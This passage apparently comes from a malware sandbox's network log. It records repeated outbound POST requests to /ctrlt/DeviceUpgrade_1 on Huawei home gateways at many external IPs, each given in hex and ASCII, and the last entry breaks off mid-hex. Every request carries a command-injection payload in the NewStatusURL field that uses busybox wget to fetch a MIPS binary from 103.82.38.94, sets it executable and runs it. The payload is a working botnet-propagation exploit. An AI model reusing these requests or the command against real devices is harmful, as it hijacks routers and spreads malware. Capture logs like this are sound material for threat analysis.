                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.1433318156.82.201.22437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129847050 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.1455078156.31.9.12837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129875898 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.1454338156.70.243.8237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129915953 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.1446652197.92.27.037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129929066 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.144424441.42.121.14437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129956007 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.1456246156.221.191.16237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129992008 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.1447806156.153.229.11437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130208015 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.1452406156.127.171.5537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130260944 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.1449250197.182.24.20237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130291939 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.143803041.111.116.837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130333900 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 